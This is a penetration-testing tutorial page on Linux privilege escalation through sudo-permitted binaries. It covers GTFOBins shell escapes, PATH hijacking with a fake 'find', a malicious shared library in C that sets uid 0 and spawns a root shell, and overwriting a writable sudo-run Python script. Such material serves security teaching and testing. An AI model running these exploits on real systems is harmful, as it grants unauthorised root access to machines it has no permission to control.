# Sudo Binaries ## Theory On this page, we speak about vulnerabilities within a sudo binary/script itself. Custom or known binaries/scripts may be exploited and allow us to subvert sudo's intended functionality. ## Practice ### Known Sudo Binaries Exploits {% tabs %} {% tab title="GTFOBins" %} If the binary is allowed to run as `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. If you find that a binary can be run as sudo, you can check on [GTFOBins](https://gtfobins.github.io/) for known exploits. ```bash $ sudo -l User demo may run the following commands on crashlab: (root): /usr/bin/awk ``` {% endtab %} {% tab title="Example" %} If you can run a binary with sudo rights, you may want to have look at [GTFOBins](https://gtfobins.github.io/), a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with `awk`, we can spawn a shell with following commands: ```bash sudo awk 'BEGIN {system("/bin/sh")}' ``` {% endtab %} {% endtabs %} ### No Command Path Exploit {% tabs %} {% tab title="Enumerate" %} If a **sudo** binary/script executes another command **without specifying the path.** We can abuse it and get a privilege escalation. {% hint style="danger" %} Note that **`env_reset`** and **`secure_path`** should not be set ! {% endhint %} You may use `strings` to spot other binaries calls, or do some reverse engineering on the **sudo** binary. ```bash $ sudo -l User demo may run the following commands on crashlab: (root): /opt/bin/the-sudo-bin $ strings ./the-sudo-bin ... find ... ``` {% endtab %} {% tab title="Exploit" %} We can create a malicious executable with the same name as the one called by the s**udo** binary. ```bash echo '/bin/bash -p' > /tmp/find chmod +x /tmp/find ``` \ Then, set the **PATH** env variable before executing the Sudo binary. ```bash #Sudo with modified PATH export PATH=/tmp:$PATH ./the-sudo-bin ``` {% endtab %} {% endtabs %} ### Shared Library Hijacking {% tabs %} {% tab title="Enumerate" %} If you find some binary with **Sudo** permissions, you can check if all the **.so** files are **loaded correctly.** ```bash strace the-sudo-bin 2>&1 | grep -i -E "open|access|no such file" ``` You also could check if the **Sudo** binary is loading a library from a folder **where we can write**: ```bash # Lets find a Sudo using a non-standard library ldd the-sudo-bin something.so => /lib/x86_64-linux-gnu/something.so # The Sudo also loads libraries from a custom location where we can write readelf -d the-sudo-bin | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` Alternatively, you could use the `strings` command to find used shared library ```bash strings ./the-sudo-bin | grep -i '*.so*' ``` {% endtab %} {% tab title="Exploit" %} For example, if you find that the **Sudo** binary **doesn't** **load correctly** *`/home/user/.config/libcalc.so`* or that you can overwrite it, you can exploit it. Write a malicious shared library ```c //Saved to /home/user/.config/libcalc.c #include #include static void hijack() __attribute__((constructor)); void hijack() { printf("Hello from the bad library"); //setreSudo(0,0,0); setuid(0); setgid(0); system("/bin/bash -p"); } ``` Compile it ```bash gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c ``` Execute the Sudo binary ```bash sudo the-sudo-bin ``` {% hint style="info" %} If you get an error such as ```shell-session ./Sudo_bin: symbol lookup error: ./Sudo_bin: undefined symbol: a_function_name ``` that means that the library you have generated need to have a function called `a_function_name`. {% endhint %} {% endtab %} {% endtabs %} ### Weak File Permissions {% tabs %} {% tab title="Enumerate" %} If you find some binary/script with **Sudo** permissions, you could check if you have enought rights to overwrite it. If so, you can replace it by a malicious one. ```bash sudo -l (root) NOPASSWD: /usr/bin/python3 /home//example.py ``` Check permissions: ```bash ls -la /home// ls -la /home//example.py ``` {% endtab %} {% tab title="Exploit" %} If the python script is **under a directory that you own**, or if you have **direct write access** on it. We can remove the script and create a new one with the same name. ```bash rm -rf /home//example.py touch /home//example.py ``` We can insert arbitrary code in the new script. For example, ```python import os;os.system('/bin/bash') ``` {% endtab %} {% endtabs %} ## References {% embed url="" %} {% embed url="" %} {% embed url="" %}